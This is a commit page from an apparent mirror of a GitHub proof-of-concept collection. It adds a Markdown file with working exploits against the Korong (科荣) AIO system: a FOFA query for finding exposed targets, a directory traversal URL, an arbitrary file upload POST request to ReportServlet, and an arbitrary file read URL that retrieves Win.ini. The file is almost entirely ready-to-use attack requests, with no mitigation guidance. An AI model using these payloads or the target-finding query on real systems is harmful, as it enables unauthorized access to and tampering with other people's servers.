mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create 科荣 AIO任意文件上传-目录遍历-任意文件读取漏洞.md
This commit is contained in:
parent
28febd2709
commit
6f3f384d1f
26
科荣 AIO任意文件上传-目录遍历-任意文件读取漏洞.md
Normal file
26
科荣 AIO任意文件上传-目录遍历-任意文件读取漏洞.md
Normal file
@ -0,0 +1,26 @@
|
|||||||
|
## 科荣 AIO任意文件上传-目录遍历-任意文件读取漏洞
|
||||||
|
|
||||||
|
## fofa
|
||||||
|
```
|
||||||
|
body="changeAccount('8000')"
|
||||||
|
```
|
||||||
|
## 目录遍历
|
||||||
|
```
|
||||||
|
http://xxxxxx/ReportServlet?operation=getFileList&path=../../../
|
||||||
|
```
|
||||||
|
|
||||||
|
## 文件上传
|
||||||
|
```
|
||||||
|
POST /ReportServlet?operation=saveFormatFile&fileName=demo.css&language= HTTP/1.1
|
||||||
|
Host: xxxxxx
|
||||||
|
Connection: lose
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 2
|
||||||
|
|
||||||
|
demo
|
||||||
|
```
|
||||||
|
|
||||||
|
## 任意文件读取
|
||||||
|
```
|
||||||
|
http://xxxxx/ReportServlet?operation=getPicFile&fileName=/DISKC/Windows/Win.ini
|
||||||
|
```
|
||||||
Loading…
x
Reference in New Issue
Block a user